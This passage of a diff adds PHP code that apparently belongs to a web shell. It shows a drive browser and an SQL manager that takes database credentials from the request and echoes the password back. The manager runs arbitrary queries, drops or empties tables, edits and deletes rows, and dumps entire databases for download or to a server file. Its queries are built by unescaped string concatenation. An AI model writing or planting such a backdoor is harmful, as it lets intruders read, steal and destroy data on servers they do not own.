+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\">^<select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
